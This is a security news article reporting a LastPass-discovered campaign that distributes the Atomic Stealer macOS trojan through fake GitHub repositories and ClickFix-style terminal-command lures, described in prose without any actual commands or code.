Redazione RHC : 23 September 2025 16:26
Cybercriminals have launched a large-scale campaign against macOS users, disguising malware as popular programs. LastPass reported this, having discovered that its product had also been spoofed . The malware is being distributed via fake GitHub repositories optimized for search engines, allowing it to appear at the top of Google and Bing search results.
The attack uses the ClickFix scheme: the victim is asked to enter a command into the terminal, supposedly to install an application. In reality, the victim executes a curl request to an encrypted URL and downloads the install.sh script to the /tmp directory .
This file installs the Atomic Stealer (AMOS) Trojan on your computer. AMOS is a malware-as-a-service (MaaS) tool that costs $1,000 per month to rent. Its basic function is to steal data from infected devices, but its creators recently added a backdoor for stealthy and persistent system access.
According to LastPass, scammers aren’t just copying a single brand. The list of counterfeit programs exceeds 100 and includes solutions like 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion , Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne.
To circumvent the restrictions, scammers create several fake GitHub accounts and duplicate repositories with a “Download” button . Clicking this button takes you to a secondary website containing instructions for running a command in the terminal.
Similar scenarios for macOS have been documented previously. Previous reports included Booking.com copies and pseudo-programs to “fix” system problems, distributed via ads . The current campaign is significantly broader: automation allows for the rapid reactivation of new pages after a blockage.
LastPass emphasizes that it constantly monitors the situation and forwards reports of fake projects to the GitHub administration , but the threat remains due to the ease of creating new resources.
Experts remind users to trust only official developer websites. If the manufacturer doesn’t offer a macOS version of a product, the “alternative” will almost certainly be malicious.
In cases where an app is available, it is important to verify that it is distributed by a trusted source and not by an unknown third party.
Redazione